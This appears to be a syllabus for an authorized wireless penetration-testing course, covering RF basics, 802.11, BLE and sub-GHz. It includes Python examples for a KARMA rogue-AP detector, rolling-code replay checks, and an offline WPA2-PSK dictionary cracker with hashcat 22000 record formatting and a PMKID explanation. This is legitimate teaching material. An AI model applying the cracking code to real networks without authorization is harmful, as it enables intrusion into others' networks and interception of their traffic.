Wireless is everywhere and mostly invisible. The course teaches licensed wireless pen testers how to characterize and test the wireless security posture of a client environment -- from RF fundamentals through 802.11, Bluetooth/BLE, sub-GHz, and a five-day simulated wireless engagement capstone.
Course mission and audience
VCA-WIR-101 is the Pentest Track's wireless specialty. Students arrive with networking (NET-101), security principles (SEC-101), and Python tooling (FND-102). They leave able to scope, conduct, and report an authorized wireless engagement.
The audience is students who can read a packet capture, reason about the CIA triad, and write Python scripts. They have not worked the RF layer. This course builds RF intuition from first principles and then applies it to a structured engagement methodology.
Position: After NET-101 + SEC-101 + FND-102. Concurrent-eligible with PEN-101 for students who have all prereqs. Gates WIR-201 / RF-201 / RF-301. Pairs with PEN-101 as the offensive-specialty pair in the Pentest Track.
Certification alignment: Students who complete WIR-101 are positioned to sit OffSec OSWP (PEN-210) within two to three months. WIR-101 exceeds OSWP's syllabus (adding Bluetooth/BLE, sub-GHz, and the site-survey/coverage-map deliverable that OSWP does not measure). SANS GAWN covers structurally similar scope at significantly higher cost.
Legal and ethical framing (load-bearing): RF emissions propagate past property boundaries by default. FCC Part 15 permits unlicensed transmit in the ISM and U-NII bands (2.4 GHz, 5 GHz, sub-GHz) within power and interference limits. FCC Part 97 governs amateur radio; the Electronic Communications Privacy Act (ECPA) prohibits intercepting communications outside authorized contexts; the CFAA applies to unauthorized access even when delivered over wireless. Students sign an AUP, maintain per-session authorization logs, and perform all active transmit work on RF-shielded or explicitly authorized equipment. The course is explicitly not "how to crack your neighbor's Wi-Fi."
Foundational anchors
WIR-101 reads paired texts across the signal-and-protocol lifecycle. The anchor pair that gives this track its narrative spine is:
Richard Lyons, Understanding Digital Signal Processing, 3rd ed. (Pearson, 2010; ISBN 978-0-13-702741-5)
Library: /media/laptop/data4t/books-master/Calibre_Library/Richard G. Lyons/Understanding Digital Signal Processing, 3rd Edition (686)/
Lyons's opening: "Digital signal processing has never been more prevalent or easier to perform." Every tool in this course -- RTL-SDR waterfall, hashcat GPU, GNU Radio flowgraph -- sits atop the DSP substrate Lyons builds from first principles. Chapters 1-6 (discrete sequences, periodic sampling and aliasing, the DFT, the FFT, FIR and IIR filters) are the WIR-101 assigned reading arc. Chapters 7 onward (quadrature signals, sample-rate conversion, averaging) deepen into the RF-201/RF-301 track.
Wyglinski, Getz, Collins, Pu, Software-Defined Radio for Engineers (Artech House, 2018; ISBN 978-1-63081-457-1; free PDF via Analog Devices)
Library: /media/laptop/data4t/books-master/Calibre_Library/Collins, Getz, Pu, Wyglinski/Software-Defined Radio for Engineers (666)/
Wyglinski bridges the Lyons DSP math to the hardware RF chain (ADC, DAC, IQ sampling, GNU Radio implementation). Chapters 1-4 are Week 1-2 preparation reading; Chapter 5 (SDR implementation) supports Week 9.
Build-it-yourself anchors (free):
Marc Lichtman, PySDR: A Guide to SDR and DSP using Python (pysdr.org; free online) The one-stop entry for SDR + DSP + Python tooling. Runs in the academy workbench via Pyodide. Required for Weeks 1, 9, and the capstone DSP-analysis path.
GNU Radio Tutorials (wiki.gnuradio.org/Tutorials; free) The canonical SDR-flowgraph platform. Week 9 requires building a working BPSK/QPSK flowgraph.
Supplementary:
- Steven W. Smith, The Scientist and Engineer's Guide to DSP (dspguide.com; free) -- older but fundamentals don't age; clearest aliasing and Fourier exposition available for free
  Library: /media/laptop/data4t/books-master/Calibre_Library/Steven W. Smith/The Scientist and Engineer's Guide to Digital Signal Processing (667)/
- Lyons, Streamlining Digital Signal Processing: Tricks of the Trade, 2nd ed. (Wiley-IEEE, 2012) -- practitioner companion; deepens for RF-201
  Library: /media/laptop/data4t/books-master/Calibre_Library/Richard G. Lyons/Streamlining Digital Signal Processing_ A Tricks of the Trade Guidebook, 2nd Edition (683)/
Petzold is CSA-101 only. WIR-101's narrative spine is Lyons DSP (structural math) + PySDR (applied tooling). This mirrors the CSA-101 Petzold + nand2tetris pair but for the RF track.
What you will know at the end
Eight outcomes in Bloom's-taxonomy order:
- Remember. State the four 802.11 frame types (management / control / data / extension, the last added by 802.11ad), the WPA/WPA2 four-way-handshake message numbers (M1-M4), the FCC unlicensed-spectrum rules for 2.4 GHz / 5 GHz / sub-GHz ISM, and the difference between SDR receive-only and licensed-transmit operation. (Assessed: midterm closed-book quiz.)
- Understand. Explain why monitor mode is a hardware-and-driver capability, why antenna gain has direction and polarization, why WPA3-SAE was designed to defeat the offline-cracking attack class, why rolling codes prevent naive replay attacks, and why open guest networks remain a legitimate engagement finding. (Assessed: Week 2 reflection; site-survey lab.)
- Apply (RF layer). Operate an RF-capable workstation: wireless NIC in monitor mode, antenna selection by use case, regulatory-compliant transmit operation; use RTL-SDR + GQRX to characterize a 433 MHz signal; build a rubber-duck quarter-wave antenna for a target frequency. (Assessed: Lab 1 + Lab 9.)
- Apply (802.11 observation). Passively observe 802.11 networks; capture management frames, associations, probe requests, and WPA/WPA2 four-way handshakes; interpret with Wireshark 802.11 dissectors. (Assessed: Lab 2 + Lab 3.)
- Apply (802.11 attack / defense assessment). Identify security posture (open / WEP / WPA-PSK / WPA2-PSK / WPA3-SAE / 802.1X) of observed networks; conduct authorized handshake capture + PMKID capture + offline cracking with hashcat (mode -m 22000) + wordlist engineering. (Assessed: Lab 4 + Lab 5.)
- Apply (rogue infrastructure). Identify and test rogue-AP and evil-twin detection mechanisms; build a karma-attack detector; understand hostapd-based rogue-AP setups and EAP credential-capture methodology in authorized lab context. (Assessed: Lab 7.)
- Apply (BLE + sub-GHz). Survey Bluetooth/BLE behavior (advertising, GATT, pairing modes) with btmon / gatttool / nRF52840 sniffer; survey sub-GHz (315/433/868/915 MHz) with RTL-SDR + HackRF; classify protocols by waveform family using Inspectrum + URH; implement a BPSK/QPSK 3-way handshake in GNU Radio or PySDR; analyze a rolling-code-on-seed garage-door protocol and replicate it against an authorized classroom demonstration device. (Assessed: Lab 8 + Lab 9.)
- Synthesize / Create. Produce a client-style wireless engagement report: site map, network inventory, per-network + Bluetooth + sub-GHz findings, RF coverage map, remediation. Deliver a 15-minute executive briefing. (Assessed: Capstone.)
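The frame-type, addressing and rogue-AP outcomes above, exercised in code. This is an added example written for this outline, not aircrack-ng, Kismet or course lab code: a parser for the 802.11 frame-control field and the ToDS/FromDS address mapping, an SSID information-element walker, and the KARMA heuristic a Lab 7 detector needs (one BSSID answering probe requests for many SSIDs, or for a canary SSID the tester invented and nobody should host). Every frame, MAC address and SSID is constructed inside the block; the 02: addresses are locally administered placeholders and the frames carry no FCS.

```python
"""Minimal 802.11 MAC-header parser and a probe-response KARMA detector.
Added example for WIR-101 (not aircrack-ng/Kismet code). Every frame below is
constructed by build_mgmt()/build_data(); the 02:.. MACs are locally administered
placeholders, not captured hardware addresses. Frames carry no FCS."""
import struct
from collections import defaultdict

FRAME_TYPES = {0: "management", 1: "control", 2: "data", 3: "extension"}
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 4: "probe-req", 5: "probe-resp",
                 8: "beacon", 10: "disassoc", 11: "auth", 12: "deauth"}
FIXED_FIELD_LEN = {4: 0, 5: 12, 8: 12}  # bytes between the header and the tagged IEs


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_header(frame):
    """Decode Frame Control and map Address1-3 to DA/SA/BSSID by the ToDS/FromDS bits."""
    fc, _dur, a1, a2, a3 = struct.unpack_from("<HH6s6s6s", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    if to_ds and not from_ds:        # station -> AP
        bssid, sa, da = a1, a2, a3
    elif from_ds and not to_ds:      # AP -> station
        da, bssid, sa = a1, a2, a3
    else:                            # management/IBSS (0,0); WDS (1,1) has a 4th address, ignored here
        da, sa, bssid = a1, a2, a3
    info = {"type": FRAME_TYPES[ftype], "subtype": subtype, "to_ds": to_ds,
            "from_ds": from_ds, "da": mac(da), "sa": mac(sa), "bssid": mac(bssid)}
    if ftype == 0:
        info["subtype_name"] = MGMT_SUBTYPES.get(subtype, f"mgmt-{subtype}")
    return info


def ssid_of(frame, info):
    """Walk the tagged IEs of a probe request/response or beacon and return the SSID (tag 0)."""
    if info["type"] != "management" or info["subtype"] not in FIXED_FIELD_LEN:
        return None
    off = 24 + FIXED_FIELD_LEN[info["subtype"]]
    while off + 2 <= len(frame):
        tag, ln = frame[off], frame[off + 1]
        if tag == 0:
            return frame[off + 2:off + 2 + ln].decode("utf-8", "replace")
        off += 2 + ln
    return None


def build_mgmt(subtype, da, sa, bssid, ssid):
    """Constructed management frame: header, zeroed fixed fields, then an SSID IE."""
    fc = subtype << 4                      # type 0, protocol version 0, no flags
    hdr = struct.pack("<HH6s6s6sH", fc, 0, da, sa, bssid, 0)
    return hdr + b"\x00" * FIXED_FIELD_LEN[subtype] + bytes([0, len(ssid)]) + ssid.encode()


def build_data(to_ds, a1, a2, a3):
    """Constructed data-frame header with either ToDS or FromDS set."""
    fc = (2 << 2) | (0x0100 if to_ds else 0x0200)
    return struct.pack("<HH6s6s6sH", fc, 0, a1, a2, a3, 0)


def detect_karma(frames, canary_ssids=frozenset(), max_ssids_per_bssid=1):
    """Flag a BSSID that answers probes for several SSIDs, or for a canary SSID nobody should host.
    Legitimate multi-SSID APs normally use one BSSID per SSID, hence the default threshold of 1."""
    answered = defaultdict(set)
    for frame in frames:
        info = parse_header(frame)
        if info.get("subtype_name") == "probe-resp":
            ssid = ssid_of(frame, info)
            if ssid is not None:
                answered[info["bssid"]].add(ssid)
    findings = []
    for bssid, ssids in sorted(answered.items()):
        hit = ssids & canary_ssids
        if hit or len(ssids) > max_ssids_per_bssid:
            findings.append({"bssid": bssid, "ssids": sorted(ssids),
                             "reason": "answered canary probe" if hit else "answers multiple SSIDs"})
    return findings


STA, AP_OK, AP_BAD = (bytes.fromhex(h) for h in ("020000000001", "02aaaaaaaa01", "02bbbbbbbb01"))
BCAST = b"\xff" * 6
CANARY = "zq-canary-7f3a"
# Constructed exchange: the station probes for three SSIDs; the real AP answers only its own,
# the KARMA-style AP answers all of them, including the canary.
SAMPLE_FRAMES = [build_mgmt(4, BCAST, STA, BCAST, s) for s in ("CorpWifi", "HomeNet", CANARY)]
SAMPLE_FRAMES += [build_mgmt(5, STA, AP_OK, AP_OK, "CorpWifi")]
SAMPLE_FRAMES += [build_mgmt(5, STA, AP_BAD, AP_BAD, s) for s in ("CorpWifi", "HomeNet", CANARY)]


def sample_findings():
    return detect_karma(SAMPLE_FRAMES, canary_ssids={CANARY})


if __name__ == "__main__":
    for f in sample_findings():
        print(f)
```

Against a live capture, feed the same two functions the 802.11 payload from a monitor-mode pcap (strip the radiotap header first) and emit the canary probe request yourself; a BSSID that answers it is a finding on its own, without waiting for the threshold.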
The wireless engagement lifecycle
The week sequence follows the wireless-specific engagement lifecycle. PTES phases apply; the wireless-specific additions are the RF reconnaissance phase (passive spectrum survey before active probing) and the regulatory compliance gate (which comes before any active transmit work).
| Phase | Course weeks | What happens |
|---|---|---|
| Pre-engagement + RF regs | Week 1 | RF fundamentals; FCC rules; AUP signing; antenna build |
| 802.11 intelligence gathering | Weeks 2-3 | Frame-level observation; site survey; Kismet; Wireshark |
| Vuln analysis (protocol layer) | Week 4 | Security-mode identification; WEP / WPA / WPA2 / WPA3 / 802.1X |
| Exploitation (cracking + rogue) | Weeks 5 + 7 | Handshake + PMKID capture + offline cracking; evil-twin testing |
| Midterm | Week 6 | Scoped wireless assessment; proctored |
| BLE + sub-GHz recon + RE | Weeks 8-9 | Bluetooth GATT enumeration; sub-GHz protocol recognition; create-your-own-comms; rolling-code replication |
| Coverage + reporting setup | Week 10 | RF coverage maps; interference analysis; engagement report structure |
| Reporting | Week 11 | Report finalization; peer review; executive briefing prep |
| Capstone engagement | Weeks 12-13 | 5-day simulated wireless engagement; report + briefing |
Course shape table
| Week | Topic | Lab |
|---|---|---|
| 1 | RF fundamentals: frequency, modulation, antennas, regulatory (FCC Part 15/97/95) | Lab 1: Rubber-duck antenna build + SDR characterization |
| 2 | 802.11 architecture: frame types, addressing, management plane, association sequence | Lab 2: Capture + annotate a full 802.11 association |
| 3 | Wireless recon: site survey, Kismet, Wireshark 802.11 dissectors | Lab 3: Full site survey + network inventory |
| 4 | 802.11 security protocols: WEP, WPA-PSK, WPA2-PSK, WPA3-SAE, 802.1X | Lab 4: Security-posture identification of observed networks |
| 5 | WPA/WPA2 handshake capture + PMKID + offline cracking | Lab 5: Crack an instructor-provided handshake |
| 6 | Midterm practical: scoped wireless assessment of lab network | Proctored exam |
| 7 | Rogue APs, evil twins, karma attacks: detection + test methodology | Lab 7: Karma detector build + rogue-AP test |
| 8 | Bluetooth + BLE: pairing modes, GATT, advertising, sniffing | Lab 8: BLE GATT enumeration of 3+ lab devices |
| 9 | Sub-GHz surveys + protocol RE; create-your-own-comms (BPSK/QPSK); rolling-code garage-door | Lab 9: Capture 3 sub-GHz protocols; implement PSK 3-way handshake; rolling-code replication |
| 10 | Engagement methodology: RF coverage maps, interference, spectrum hygiene | Lab 10: Client-style RF coverage survey |
| 11 | Report writing + client communication + ethics of disclosure | Lab 11: Report workshop (draft + peer review) |
| 12-13 | Capstone: 5-day simulated wireless engagement | Report + 15-min executive briefing |
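The Week 5 / Lab 5 math, as an added example that is not hashcat, hcxtools or course code: how a WPA2-PSK passphrase becomes the PMK, PTK and EAPOL MIC, where the PMKID comes from, what the two hashcat -m 22000 record types carry, and the per-candidate check a cracker runs. The SSID, passphrase, MAC addresses and nonces are constructed; the EAPOL message 2 is minimal (empty key data, where a real M2 carries the RSN IE), which changes nothing about the MIC computation.

```python
"""WPA2-PSK key schedule behind hashcat -m 22000: PBKDF2 -> PMK, PRF-512 -> PTK/KCK,
HMAC-SHA1 -> EAPOL MIC and PMKID, and the offline check a cracker runs per candidate.
Added example (not hashcat or hcxtools code). SSID, passphrase, MACs and nonces are
constructed; the M2 frame is minimal (empty key data), real M2s carry the RSN IE."""
import hashlib
import hmac
import struct

MIC_OFF = 81    # EAPOL(4) + desc(1) + keyinfo(2) + keylen(2) + replay(8) + nonce(32) + IV(16) + RSC(8) + ID(8)
NONCE_OFF = 17  # EAPOL(4) + desc(1) + keyinfo(2) + keylen(2) + replay(8)


def pmk_from_passphrase(passphrase, ssid):
    """WPA/WPA2 PSK: PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(pmk, aa, spa, anonce, snonce):
    """802.11 PRF-512 'Pairwise key expansion' (WPA/WPA2; WPA3-SAE derives its PMK differently)."""
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + b + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]   # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck, eapol):
    """Key-descriptor version 2 MIC: HMAC-SHA1-128 over the frame with the MIC field zeroed."""
    zeroed = eapol[:MIC_OFF] + b"\x00" * 16 + eapol[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def pmkid(pmk, aa, spa):
    """PMKID = HMAC-SHA1-128(PMK, 'PMK Name' || AA || SPA); the clientless attack reads it from the AP's M1."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def build_eapol_m2(snonce, mic=b"\x00" * 16):
    """EAPOL-Key message 2: RSN descriptor, key info 0x010a (v2 / pairwise / MIC), 16-byte key length."""
    body = struct.pack(">BHHQ32s16s8s8s16sH", 2, 0x010a, 16, 1, snonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, 0)
    return struct.pack(">BBH", 2, 3, len(body)) + body   # EAPOL version 2, type 3 = EAPOL-Key


def hashcat_22000_lines(ssid, aa, spa, anonce, eapol, pmkid_val):
    """The two -m 22000 record types hcxpcapngtool emits: 02 = EAPOL (message pair 00 = M1/M2), 01 = PMKID."""
    essid = ssid.encode().hex()
    mic = eapol[MIC_OFF:MIC_OFF + 16].hex()
    return [f"WPA*02*{mic}*{aa.hex()}*{spa.hex()}*{essid}*{anonce.hex()}*{eapol.hex()}*00",
            f"WPA*01*{pmkid_val.hex()}*{aa.hex()}*{spa.hex()}*{essid}***"]


def crack(ssid, aa, spa, anonce, eapol, candidates):
    """What hashcat does per candidate on the GPU: PBKDF2, PRF, HMAC, compare with the captured MIC.
    The SNonce is not a separate field of the record; it is read out of the captured M2."""
    snonce = eapol[NONCE_OFF:NONCE_OFF + 32]
    target = eapol[MIC_OFF:MIC_OFF + 16]
    for cand in candidates:
        kck = prf_512(pmk_from_passphrase(cand, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), target):
            return cand
    return None


def demo():
    """Constructed handshake: derive the MIC the station would send, then recover the passphrase."""
    ssid, passphrase = "LabNet-WIR101", "correct horse battery"
    aa, spa = bytes.fromhex("02aaaaaaaa01"), bytes.fromhex("020000000001")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    pmk = pmk_from_passphrase(passphrase, ssid)
    kck = prf_512(pmk, aa, spa, anonce, snonce)[:16]
    m2 = build_eapol_m2(snonce)
    m2 = m2[:MIC_OFF] + eapol_mic(kck, m2) + m2[MIC_OFF + 16:]    # the frame the STA transmits
    lines = hashcat_22000_lines(ssid, aa, spa, anonce, m2, pmkid(pmk, aa, spa))
    found = crack(ssid, aa, spa, anonce, m2, ["password", "LabNet-WIR101", passphrase])
    return found, lines


if __name__ == "__main__":
    found, lines = demo()
    print("cracked:", found)
    print("\n".join(lines))
```

Two things worth noticing from the code: the 4096-iteration PBKDF2 is the entire cost of the attack (the PRF and HMAC after it are cheap), which is why passphrase entropy rather than key length decides the outcome; and the PMKID path needs only the AP's first message, which is why a PSK network is crackable with no client present at all.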
Anchor readings by week
| Week | Required | Optional |
|---|---|---|
| 1 | Lyons Ch 1 (Discrete Sequences + intro); PySDR Ch 1 (IQ Sampling) | Wyglinski Ch 1 (RF fundamentals) |
| 2 | PySDR Ch 9 (Noise and dB) | Wyglinski Ch 2 (ADC/DAC) |
| 3 | PySDR Ch 2 (Frequency Domain) | Smith DSP Ch 8 (The Discrete Fourier Transform) |
| 4 | Lyons Ch 2 (Periodic Sampling); Wyglinski Ch 3 (Transceiver architectures) | WPA3 Specification (Wi-Fi Alliance) and IEEE 802.11-2020 clause 12.4 (SAE) |
| 5 | PySDR Ch 3 (Modulation) | Hashcat WPA cracking wiki (hashcat.net) |
| 6 | Review Wks 1-5 | -- |
| 7 | PySDR Ch 4 (OFDM) | KARMA original research (Dino Dai Zovi and Shane Macaulay, 2004; free) |
| 8 | PySDR Ch 5 (Link budgets) | Bluetooth Core Specification: GAP + GATT overview (free PDF at bluetooth.com) |
| 9 | Lyons Ch 3 (The DFT: spectrum analysis); Wyglinski Ch 5 (SDR implementation) | URH User Guide (github.com/jopohl/urh) |
| 10 | PySDR Ch 8 (Channel Models) | Site survey methodology (Ekahau training docs; free overview) |
| 11 | Review all findings | -- |
Per-week time budget
| Week | Lecture | Lab | Indep reading | Indep practice | Total |
|---|---|---|---|---|---|
| 1 | 1 hr | 2 hr | 1.5 hr | 1 hr | 5.5 hr |
| 2 | 1 hr | 3 hr | 1.5 hr | 1 hr | 6.5 hr |
| 3 | 1 hr | 4 hr | 1.5 hr | 1 hr | 7.5 hr |
| 4 | 1 hr | 3 hr | 1.5 hr | 1.5 hr | 7 hr |
| 5 | 1 hr | 4 hr | 1 hr | 2 hr | 8 hr |
| 6 | 0.5 hr | 3 hr (midterm) | 1 hr | 1 hr | 5.5 hr |
| 7 | 1 hr | 3 hr | 1 hr | 1.5 hr | 6.5 hr |
| 8 | 1 hr | 4 hr | 1.5 hr | 1 hr | 7.5 hr |
| 9 | 1 hr | 5 hr | 1.5 hr | 2 hr | 9.5 hr |
| 10 | 1 hr | 4 hr | 1 hr | 1.5 hr | 7.5 hr |
| 11 | 1 hr | 3 hr | 1 hr | 2 hr | 7 hr |
| Cap | 0 hr | 22 hr (engagement) | 2 hr | 11 hr (report+briefing) | 35 hr |
| Total | ~10.5 hr | ~60 hr | ~16 hr | ~26.5 hr | ~113 hr |
(Column sums come to ~113 hr, roughly 7 hr above the public-page ~106 hr figure; lab/indep balance skews lab-heavy per peer-course norms for hands-on wireless courses.)
Lab index
| Lab | Title | Week | Authorized target | Deliverable |
|---|---|---|---|---|
| 1 | RF Fundamentals + Antenna Build | 1 | Instructor-assigned demo signals; RTL-SDR receive only | Hand-built rubber-ducky antenna; SDR spectrum capture |
| 2 | 802.11 Association Sequence | 2 | Instructor-controlled lab AP (authorized) | Annotated PCAP of full association sequence |
| 3 | Site Survey | 3 | Lab space (authorized; no active injection) | Heatmap + network inventory (SSID / channel / BSSID / vendor / RSSI) |
| 4 | Security-Posture Identification | 4 | Same lab networks from Lab 3 | Per-network security-mode classification |
| 5 | WPA/WPA2 Handshake Cracking | 5 | Instructor-provided .cap file (authorized) | Cracked passphrase; hashcat transcript + wordlist archive |
| Midterm | Scoped Wireless Assessment | 6 | Instructor-built lab network | Transcript + one-page finding summary |
| 7 | Karma / Evil-Twin Detection | 7 | Instructor-run rogue AP (authorized lab) | Karma detector code; detection transcript |
| 8 | Bluetooth / BLE Enumeration | 8 | Instructor-placed lab BLE devices | GATT enumeration of 3+ devices; advertising-frame analysis |
| 9 | Sub-GHz + PSK Comms + Rolling Code | 9 | RTL-SDR receive; instructor demo device; authorized BPSK lab channel | 3 classified sub-GHz captures; BPSK 3-way handshake flowgraph; rolling-code analysis report |
| 10 | RF Coverage Survey | 10 | Authorized lab space | Mapped coverage report; interference findings; recommendations |
| 11 | Report Workshop | 11 | Output of Labs 2-10 | Draft engagement report; peer review notes |
| Capstone | 5-Day Simulated Engagement | 12-13 | Instructor-built RF testbed | Engagement report + site map + PCAP archive + briefing deck |
Authorization note: All active transmit work (deauth injection in Lab 5; rogue AP in Lab 7; HackRF TX in Lab 9) is performed on instructor-owned, RF-shielded equipment within an authorized lab environment, under FCC Part 15 power limits or with explicit Part 97 licensed-operator supervision. Students never perform active transmit operations outside the RF-shielded lab.
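Lab 9's rolling-code analysis rests on one receiver-side check, which the following added example isolates. It is a generic model written for this outline, not the protocol of the classroom demonstration device, not KeeLoq, and not course code: each press carries a counter and a truncated HMAC tag over serial||counter, and the receiver accepts a frame only if the tag verifies and the counter lies strictly ahead of the last accepted one, inside a bounded resync window. Key, serial and counters are constructed; the counter is sent in clear for readability where real remotes encrypt it.

```python
"""Why a sniffed rolling-code frame fails on replay. Added example: a generic model (counter plus
truncated HMAC over serial||counter, forward counter window at the receiver), not the classroom
demo device's protocol and not KeeLoq; key and serial are constructed."""
import hashlib
import hmac
import struct

TAG_LEN = 4      # 32-bit tag, comparable to the hopping-code width of common remotes
WINDOW = 16      # how many uncaptured presses (out of range) the receiver tolerates
KEY = b"constructed-demo-key-not-a-real-secret"
SERIAL = 0x12345678


def encode(key, serial, counter):
    """Frame = serial(4) || counter(2) || HMAC-SHA256(key, serial||counter)[:TAG_LEN]."""
    body = struct.pack(">IH", serial, counter)
    return body + hmac.new(key, body, hashlib.sha256).digest()[:TAG_LEN]


class Remote:
    def __init__(self, serial, key, counter=0):
        self.serial, self.key, self.counter = serial, key, counter

    def press(self):
        self.counter = (self.counter + 1) & 0xFFFF   # 16-bit counter; wrap-around handling omitted
        return encode(self.key, self.serial, self.counter)


class Receiver:
    def __init__(self, serial, key, last_counter=0):
        self.serial, self.key, self.last = serial, key, last_counter

    def accept(self, frame):
        """Accept only a frame whose tag verifies AND whose counter is ahead of the last one seen,
        by at most WINDOW. Anything at or below self.last is a replay, however valid its tag."""
        if len(frame) != 6 + TAG_LEN:
            return False
        serial, counter = struct.unpack(">IH", frame[:6])
        if serial != self.serial or not hmac.compare_digest(frame, encode(self.key, serial, counter)):
            return False                       # wrong device or forged/tampered frame
        if not self.last < counter <= self.last + WINDOW:
            return False                       # replayed (<= last) or desynchronised (> last + WINDOW)
        self.last = counter
        return True


def replay_attack(remote, receiver, legit_presses=2):
    """Sniff legit presses, then replay every captured frame: returns (legit results, replay results)."""
    captured = [remote.press() for _ in range(legit_presses)]
    legit = [receiver.accept(f) for f in captured]
    replayed = [receiver.accept(f) for f in captured]
    return legit, replayed


if __name__ == "__main__":
    remote, rx = Remote(SERIAL, KEY), Receiver(SERIAL, KEY)
    print(replay_attack(remote, rx))      # ([True, True], [False, False])
```

The model also shows what the Lab 9 replication step must establish before a finding is written: a device that accepts the second `accept()` of the same frame has no counter check, and one that accepts a frame with a re-signed counter from a wrong key has no tag check. Either is a finding; a plain replay failing is the expected baseline, not a result.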
SDR platform guide
| Platform | Role in course | Spec | Cost |
|---|---|---|---|
| RTL-SDR Blog V4 | Student receive-only SDR; sub-GHz survey workhorse | 500 kHz-1.75 GHz; 8-bit; RX only | ~$40 |
| HackRF One | Program-supplied; transmit-capable; Lab 9 authorized TX | 1 MHz-6 GHz; 8-bit; half-duplex TX/RX | ~$350 |
| ANTSDR E200 | Advanced platform; program-supplied; Wyglinski labs; Zynq-7020 + AD9363 | 70 MHz-6 GHz; full-duplex MIMO | ~$400 |
| LimeSDR Mini | Advanced alternate; full-duplex; LMS7002M | 10 MHz-3.5 GHz | ~$200 |
| ADALM-PLUTO | Virtual-path emulation; classroom-demo use | 325 MHz-3.8 GHz (ext: 70 MHz-6 GHz) | ~$250 |
Virtual / recorded-capture path: Students without physical SDR hardware complete labs via instructor-provided IQ recordings (.iq / .sigmf format). GNU Radio File Source block + PySDR np.fromfile() loads a recording identically to live hardware. All spectrum-analysis and demodulation labs have a documented virtual-path variant. Transmit labs (Lab 9 TX) can be simulated via GNU Radio's Signal Source + Throttle blocks without any physical hardware.
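The loader step of the virtual path, as an added example that is not PySDR, GNU Radio or course code: read a raw interleaved-IQ file in the three layouts the hardware on this page produces (GNU Radio File Sink complex64, hackrf_transfer signed 8-bit, rtl_sdr unsigned 8-bit, named here by their SigMF datatype strings), take an FFT, and map the peak bin back to an absolute frequency. It uses only the standard library in place of np.fromfile and np.fft so it runs without numpy; the "capture" is synthesised inside demo() and deleted afterwards, and the sample rate and centre frequency are assumed values.

```python
"""Load a raw IQ recording the way the virtual-lab path does and locate the strongest carrier.
Added example (not PySDR or GNU Radio code): a stdlib stand-in for np.fromfile + np.fft so it
runs without numpy. The "capture" is synthesised by demo(); no real recording is read."""
import cmath
import math
import os
import struct
import tempfile

# Raw interleaved-IQ layouts, keyed by SigMF datatype string: (struct code, scale, offset).
FORMATS = {
    "cf32_le": ("f", 1.0, 0.0),     # GNU Radio File Sink complex64: float32 I,Q pairs
    "ci8": ("b", 128.0, 0.0),       # hackrf_transfer: signed 8-bit I,Q
    "cu8": ("B", 127.5, 127.5),     # rtl_sdr: unsigned 8-bit I,Q centred on 127.5
}


def write_iq(path, samples, fmt):
    """Serialise complex samples in the chosen raw layout (the inverse of read_iq)."""
    code, scale, offset = FORMATS[fmt]
    flat = [v * scale + offset for s in samples for v in (s.real, s.imag)]
    if code != "f":
        flat = [int(round(v)) for v in flat]
    with open(path, "wb") as f:
        f.write(struct.pack("<" + code * len(flat), *flat))


def read_iq(path, fmt):
    """Equivalent of np.fromfile(path, dtype) followed by the (I + jQ - offset) / scale step."""
    code, scale, offset = FORMATS[fmt]
    width = struct.calcsize(code)
    with open(path, "rb") as f:
        raw = f.read()
    n = len(raw) // (2 * width)
    vals = struct.unpack("<" + code * (2 * n), raw[:2 * n * width])
    return [complex((vals[2 * i] - offset) / scale, (vals[2 * i + 1] - offset) / scale)
            for i in range(n)]


def fft(x):
    """Radix-2 decimation-in-time FFT; len(x) must be a power of two."""
    n = len(x)
    if n == 1:
        return list(x)
    even, odd = fft(x[0::2]), fft(x[1::2])
    out = [0j] * n
    for k in range(n // 2):
        t = cmath.exp(-2j * math.pi * k / n) * odd[k]
        out[k], out[k + n // 2] = even[k] + t, even[k] - t
    return out


def strongest_carrier(samples, sample_rate, center_hz):
    """Return (absolute Hz, dBFS) of the peak bin. Bins >= N/2 are negative offsets from centre
    (the fftshift step people forget); |X[k]|^2 / N^2 is 1 (0 dBFS) for a full-scale tone."""
    n = len(samples)
    if n == 0 or n & (n - 1):
        raise ValueError("use a power-of-two number of samples")
    power = [abs(v) ** 2 for v in fft(samples)]
    k = max(range(n), key=power.__getitem__)
    offset = (k - n if k >= n // 2 else k) * sample_rate / n
    return center_hz + offset, 10 * math.log10(power[k] / (n * n))


def demo(fmt="ci8", n=1024, sample_rate=2_048_000, center_hz=433_920_000, offset_hz=250_000):
    """Synthesise a -6 dBFS tone offset_hz from centre (on an exact bin, so no leakage), round-trip
    it through a file in the chosen layout, then find it as a receiver script would."""
    tone = [0.5 * cmath.exp(2j * math.pi * offset_hz * i / sample_rate) for i in range(n)]
    path = os.path.join(tempfile.mkdtemp(), "capture." + fmt)
    try:
        write_iq(path, tone, fmt)
        samples = read_iq(path, fmt)
    finally:
        if os.path.exists(path):
            os.remove(path)
    return strongest_carrier(samples, sample_rate, center_hz)


if __name__ == "__main__":
    for fmt in FORMATS:
        print(fmt, demo(fmt))
```

On a real recording, replace demo() with read_iq(path, fmt) and the sample rate and centre frequency from the SigMF metadata (or from the hackrf_transfer / rtl_sdr command line); a peak that lands at exactly the centre frequency is usually DC offset from the receiver, not a signal.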
Toolchain Diary additions (WIR-101)
WIR-101 is the canonical originating course for the RF-track tool corpus. Later courses (RF-201, RF-301, RE-201) reference rather than re-introduce these entries.
- PySDR (in-browser, Pyodide LIVE) -- Marc Lichtman's DSP-and-SDR textbook runs in the academy workbench; no local install required. Canonical RF-track entry.
